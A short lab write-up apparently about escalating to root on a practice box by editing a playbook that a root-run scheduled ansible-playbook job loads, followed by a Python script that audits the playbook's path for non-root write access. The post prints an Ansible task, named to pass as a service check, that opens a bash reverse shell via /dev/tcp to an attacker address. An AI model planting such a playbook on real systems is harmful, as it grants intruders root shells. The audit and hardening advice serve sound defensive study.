Ansible Yml file for Reverse Shell

Hi Friends

I was just practicing on one of the vulnerable boxes available, and I found something simple but effective for escalating our privileges.

During my post-exploitation, I did an enumeration using pspy64 and found something quite interesting: a process called ansible-playbook is run periodically based on the configuration specified in playbook_1.yml.

We can see that this service runs with root privileges, since the id = 0. In this case we can write an Ansible configuration in order to execute our malicious activities.

I would like to share a simple Ansible YAML file that initiates a reverse shell:

- hosts: localhost
  tasks:
  - name: Checking webapp service
    shell: /bin/bash -c '/bin/bash -i > /dev/tcp/10.10.14.13/1234 0<&1 2>&1'
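
From the defender's side, the thing to check is whether any non-root account can change the playbook that root's scheduled ansible-playbook run loads. The following is an added example, not part of the original post: a small audit that walks from the playbook file up to / and reports every path component a non-root user could write to. The function name `audit_root_playbook` and the choice to trust only uid 0 and gid 0 by default are assumptions of this example.

```python
import os
import stat
import sys

def audit_root_playbook(path, trusted_uids=(0,), trusted_gids=(0,)):
    """Return (path, reason) findings for a playbook that root executes.

    The file and every parent directory are checked: write access to any of
    them lets a user change what the scheduled root run executes.
    """
    findings = []
    current = os.path.realpath(path)  # resolve symlinks to the real target
    while True:
        st = os.stat(current)
        # A sticky directory (e.g. /tmp) stops users replacing entries
        # they do not own, so its write bits are not reported.
        sticky_dir = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
        if st.st_uid not in trusted_uids:
            findings.append((current, f"owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWOTH and not sticky_dir:
            findings.append((current, "world-writable"))
        if (st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids
                and not sticky_dir):
            findings.append((current, f"writable by gid {st.st_gid}"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            break
        current = parent
    return findings

if __name__ == "__main__":
    # Usage: python3 audit.py /path/to/playbook.yml
    if len(sys.argv) != 2:
        sys.exit("usage: audit.py PLAYBOOK")
    results = audit_root_playbook(sys.argv[1])
    for item, reason in results:
        print(f"{item}: {reason}")
    sys.exit(1 if results else 0)
```

Any finding means the playbook, or a directory above it, should be re-owned by root and have its group and world write bits removed before root is allowed to run it on a schedule.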